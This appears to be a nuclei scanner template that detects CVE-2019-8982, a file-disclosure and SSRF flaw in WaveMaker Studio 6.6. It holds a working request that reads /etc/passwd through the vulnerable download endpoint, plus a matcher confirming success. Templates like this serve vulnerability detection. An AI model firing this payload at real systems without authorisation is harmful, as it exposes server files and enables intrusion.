nuclei-templates/cves/2019/CVE-2019-8982.yaml

28 lines
850 B
YAML

id: CVE-2019-8982
info:
name: Wavemaker Studio 6.6 LFI/SSRF
author: madrobot
severity: critical
description: com/wavemaker/studio/StudioService.java in WaveMaker Studio 6.6 mishandles the studioService.download?method=getContent&inUrl= value, leading to disclosure of local files and SSRF.
reference: https://www.exploit-db.com/exploits/45158
tags: cve,cve2019,wavemaker,lfi,ssrf
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
cvss-score: 9.60
cve-id: CVE-2019-8982
cwe-id: CWE-918
requests:
- method: GET
path:
- "{{BaseURL}}/wavemaker/studioService.download?method=getContent&inUrl=file///etc/passwd"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
regex:
- "root:.*:0:0:"
part: body